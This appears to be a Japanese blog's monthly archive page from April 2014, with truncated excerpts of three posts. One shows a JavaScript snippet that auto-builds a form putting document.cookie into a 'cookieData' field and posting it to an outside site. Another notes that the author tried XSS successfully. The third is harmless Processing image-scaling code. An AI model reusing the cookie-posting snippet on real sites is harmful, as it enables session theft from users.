2014-04-01から1ヶ月間の記事一覧

自動送信のform

これでscriptだけでformが遅れます。 <html> <body> </body> <script> var frm = document.createElement("form"); var ipt1 = document.createElement("input"); frm.action = "http://www.yahoo.co.jp"; frm.method = "post"; ipt1.name = "cookieData"; ipt1.value = document.cookie</html>…

Javascriptが動くのでXSSを試してみる

できちゃったよ・・・3秒後に表示されます。 // //

Processingでwidthとheightで大きい方にあわせる

PImage img; void setup() { size(800, 300); img = loadImage("IMG_0266.jpg"); float w, h; if (img.width>img.height) { w = (float)width; h = (float)width/img.width*img.height; } else { w = (float)height/img.height*img.width; h = (float)height…